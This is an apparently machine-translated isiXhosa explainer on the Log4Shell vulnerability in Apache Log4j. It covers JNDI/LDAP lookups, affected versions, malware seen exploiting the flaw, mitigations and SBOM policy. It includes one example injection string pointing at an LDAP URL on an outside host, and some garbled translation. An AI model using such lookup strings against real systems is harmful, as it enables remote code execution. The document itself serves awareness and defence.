Isiqulatho[Fihla][Bonisa]
Ekupheleni kukaNovemba ka-2021, siye safumanisa isoyikiso esikhulu kukhuseleko lwe-cyber. Oku kuxhaphaza kunokuchaphazela izigidi zeenkqubo zekhompyuter kwihlabathi jikelele.
Esi sisikhokelo kubuthathaka be-Log4j kunye nendlela isiphene soyilo esingahoywanga esishiye ngaphezulu kwe-90% yeenkonzo zekhompyuter zehlabathi zivulekele ukuhlaselwa.
I-Apache Log4j sisixhobo esivulelekileyo sokugawulwa kwemithi esekwe kwiJava esiphuhliswe yiApache Software Foundation. Ekuqaleni ibhalwe nguCeki Gülcü kwi-2001, ngoku iyinxalenye ye-Apache Logging Services, iprojekthi ye-Apache Software Foundation.
Iinkampani kwihlabathi jikelele zisebenzisa ithala leencwadi le-Log4j ukunika amandla ukungena kwizicelo zabo. Ngapha koko, ilayibrari yeJava iyinto yonke, ungayifumana kwizicelo ezivela kwiAmazon, Microsoft, Google, kunye nokunye.
Ukubalasela kwethala leencwadi kuthetha ukuba nasiphi na isiphene esinokubakho kwikhowudi sinokushiya izigidi zeekhompyuter zivuleleke kuqhekezo. Ngomhla wama-24 kuNovemba ka-2021, a ukhuseleko kwilifu Umphandi osebenzela uAlibaba ufumanise isiphene esibi.
Ubuthathaka be-Log4j, ekwaziwa ngokuba yi-Log4Shell, ibikhona ingaqatshelwanga ukusukela ngo-2013. Ubuthathaka buvumele abadlali abakhohlakeleyo ukuba baqhube ikhowudi kwiisistim ezichaphazelekayo ezisebenzisa i-Log4j. Yabhengezwa esidlangalaleni nge-9 kaDisemba, 2021
Iingcali zeshishini zibiza i-Log4Shell isiphene ubuthathaka obukhulu kwinkumbulo yamva nje.
Kwiveki elandela ukupapashwa komngcipheko, amaqela okhuseleko lwe-cybersecurity afumanisa izigidi zohlaselo. Abanye abaphandi bade babona ukuhlasela okungaphezu kwekhulu ngomzuzu.
Ingaba isebenza kanjani?
Ukuqonda ukuba kutheni i-Log4Shell iyingozi kangaka, kufuneka siqonde ukuba yintoni ekwaziyo ukuyenza.
Ubuthathaka be-Log4Shell buvumela ukwenziwa kwekhowudi ngokungekho mthethweni, nto leyo ethetha ukuba umhlaseli unokuqhuba nawuphi na umyalelo okanye ikhowudi kumatshini ekujoliswe kuwo.
Ikwenza njani oku?
Okokuqala, kufuneka siqonde ukuba yintoni i-JNDI.
I-Java Nameing and Directory Interface (JNDI) yinkonzo yeJava evumela iinkqubo zeJava ukuba zifumane kwaye zijonge idatha kunye nezixhobo ngokusebenzisa igama. Ezi nkonzo zolawulo zibalulekile kuba zibonelela ngeerekhodi ezicwangcisiweyo ukuze abaphuhlisi babhekiselele ngokulula xa besenza izicelo.
I-JNDI inokusebenzisa iiprothokholi ezahlukeneyo ukufikelela kulawulo oluthile. Enye yezi protocol yi-Lightweight Directory Access Protocol, okanye i-LDAP.
Xa ugawula umtya, Ilog4j yenza utshintsho lomtya xa bedibana neentetho zefom ${prefix:name}
.
Umzekelo, Text: ${java:version}
inokufakwa njengombhalo: uguqulelo lweJava 1.8.0_65. Olu hlobo lokutshintshwa luxhaphakile.
Kwakhona sinokuba namabinzana afana nala Text: ${jndi:ldap://example.com/file}
esebenzisa inkqubo ye-JNDI ukulayisha into yeJava esuka kwi-URL nge-LDAP protocol.
Oku kulayisha ngempumelelo idatha evela kuloo URL ukuya kumatshini. Nayiphi na i-hacker enokubakho inokusingatha ikhowudi enobungozi kwi-URL yoluntu kwaye ulinde oomatshini abasebenzisa i-Log4j ukuyiloga.
Ekubeni imixholo yemiyalezo yelogi iqulethe idatha elawulwa ngumsebenzisi, abahlaseli banokufaka iireferensi zabo ze-JNDI ezikhomba kwiiseva ze-LDAP abazilawulayo. Ezi seva ze-LDAP zinokugcwala zizinto zeJava ezinobungozi apho i-JNDI inokuthi iphumeze ngokuba sesichengeni.
Yintoni eyenza oku kube mandundu kukuba akukhathaliseki nokuba isicelo sikwicala lomncedisi okanye sisicelo secala lomxhasi.
Ngethuba nje kukho indlela yokuba i-logger ifunde ikhowudi ekhohlakeleyo yomhlaseli, isicelo sisavulekele ukuxhaphaza.
Ngubani ochaphazelekayo?
Ukuba sesichengeni kuchaphazela zonke iinkqubo kunye neenkonzo ezisebenzisa i-APache Log4j, kunye neenguqulelo ze-2.0 ukuya kuthi ga ku-2.14.1.
Iingcali ezininzi zokhuseleko zicebisa ukuba ukuba sesichengeni kunokuchaphazela inani lezicelo zisebenzisa iJava.
Isiphene safunyanwa okokuqala kumdlalo wevidiyo weMinecraft ophethwe nguMicrosoft. IMicrosoft ibongoze abasebenzisi bayo ukuba baphucule uhlelo lwabo lweJava lweMinecraft software ukunqanda nayiphi na ingozi.
UJen Easterly, uMlawuli we-Cybersecurity and Infrastructure Security Agency (CISA) uthi abathengisi bane uxanduva olukhulu ukuthintela abasebenzisi bokugqibela kubadlali abakhohlakeleyo abasebenzisa obu buthathaka.
"Abathengisi kufuneka banxibelelane nabathengi babo ukuqinisekisa ukuba abasebenzisi bokugqibela bayazi ukuba imveliso yabo inobu buthathaka kwaye kufuneka babeke phambili uhlaziyo lwesoftware."
Uhlaselo sele luqalisile. I-Symantec, inkampani ebonelela ngesoftware ye-cybersecurity, ibone inani elahlukileyo lezicelo zohlaselo.
Nantsi eminye imizekelo yeentlobo zohlaselo oluchongwe ngabaphandi:
- tnets
I-Botnets yinethiwekhi yeekhompyuter eziphantsi kolawulo lweqela elinye elihlaselayo. Banceda ukwenza uhlaselo lwe-DDoS, ukweba idatha, kunye nobunye ubuqhetseba. Abaphandi baye baqaphela i-botnet ye-Muhstik kwizikripthi zeqokobhe ezikhutshelwe kwi-Log4j exploit.
- XMRig Miner Trojan
I-XMRig ngumthombo ovulekileyo we-cryptocurrency umgodi osebenzisa ii-CPU ukwenza umgodi we-Monero. I-Cybercriminals inokufaka i-XMRig kwizixhobo zabantu ukuze bakwazi ukusebenzisa amandla abo okusebenza ngaphandle kolwazi lwabo.
- Khonsari Ransomware
I-Ransomware ibhekisa kuhlobo lwe-malware eyilelwe Fihla iifayile kwikhompyuter. Abahlaseli banokufuna intlawulo ngokutshintshiselana ngokunika ufikelelo kwiifayile ezifihliweyo. Abaphandi bafumanise i-Khonsari ransomware kuhlaselo lwe-Log4Shell. Bajolisa kwiiseva zeWindows kwaye basebenzise isakhelo se.NET.
Kwenzeka ntoni emva koko?
Iingcali ziqikelela ukuba kungathatha iinyanga okanye iminyaka ukulungisa ngokupheleleyo isiphithiphithi esiziswe bubuthathaka be-Log4J.
Le nkqubo ibandakanya uhlaziyo lwenkqubo nganye echaphazelekayo ngoguqulelo oluzigcawu. Nokuba zonke ezi sistim zikhutshiwe, kusekho isoyikiso esizayo se-backdoors ezinokwenzeka ukuba abahlaseli banokuba sele bongeze kwifestile ukuba iiseva bezivulelwe ukuhlaselwa.
abaninzi izisombululo kunye nokunciphisa zikhona ukunqanda izicelo ekubeni zisetyenziswe yile bug. Inguqulo entsha ye-Log4j 2.15.0-rc1 itshintshe iisetingi ezahlukeneyo zokunciphisa obu buthathaka.
Zonke izinto ezisebenzisa i-JNDI ziya kucinywa ngokungagqibekanga kwaye ukujonga kude kuthintelwe. Ukuyekisa inqaku lokukhangela kwi-Log4j yokuseta kuya kunceda ukunciphisa umngcipheko wokuxhaphaza okunokwenzeka.
Ngaphandle kwe-Log4j, kusekho imfuneko yesicwangciso esibanzi sokuthintela ukuxhaphaza okuvulelekileyo.
Ngaphambili ngoMeyi, i-White House yakhupha i- umyalelo olawulayo ejolise ekuphuculeni ukhuseleko lonxibelelwano lwesizwe. Yayibandakanya isibonelelo se-software bill of materials (SBOM) eyayiluxwebhu olusesikweni oluqulathe uluhlu lwazo zonke izinto ezifunekayo ukwakha isicelo.
Oku kubandakanya iindawo ezifana ne Vula Umnikezi iipakethe, ukuxhomekeka, kunye nee-API ezisetyenziselwa uphuhliso. Nangona umbono wee-SBOMs ziluncedo elubala, ngaba iya kumnceda ngokwenene umthengi?
Ukuphucula ukuxhomekeka kunokuba yingxaki kakhulu. Iinkampani zinokukhetha ukuhlawula naziphi na izohlwayo endaweni yokubeka umngcipheko wokuchitha ixesha elongezelelweyo ngokufumana ezinye iipakethe. Mhlawumbi ezi SOMs ziya kuba luncedo kuphela ukuba zabo ububanzi ulinganiselwe ngakumbi.
isiphelo
Umba we-Log4j ungaphezulu nje kwengxaki yobugcisa kwimibutho.
Iinkokeli zoshishino kufuneka zizazi iingozi ezinokuthi zenzeke xa iiseva zabo, iimveliso, okanye iinkonzo zixhomekeke kwikhowudi abangayigcini ngokwabo.
Ukuxhomekeka kumthombo ovulekileyo kunye nezicelo zeqela lesithathu zihlala zihamba nomngcipheko othile. Iinkampani kufuneka zithathele ingqalelo ukusebenzisa amacebo okunciphisa umngcipheko phambi kokuba kuvele izoyikiso ezintsha.
Uninzi lwewebhu luxhomekeke kwisoftware evulelekileyo egcinwe ngamawaka amavolontiya kwihlabathi liphela.
Ukuba sifuna ukugcina iwebhu iyindawo ekhuselekileyo, oorhulumente kunye namaqumrhu kufuneka batyale imali kwimizamo yomthombo ovulekileyo kunye neearhente zokhuseleko lwe-cyber ezifana I-CISA.
Shiya iMpendulo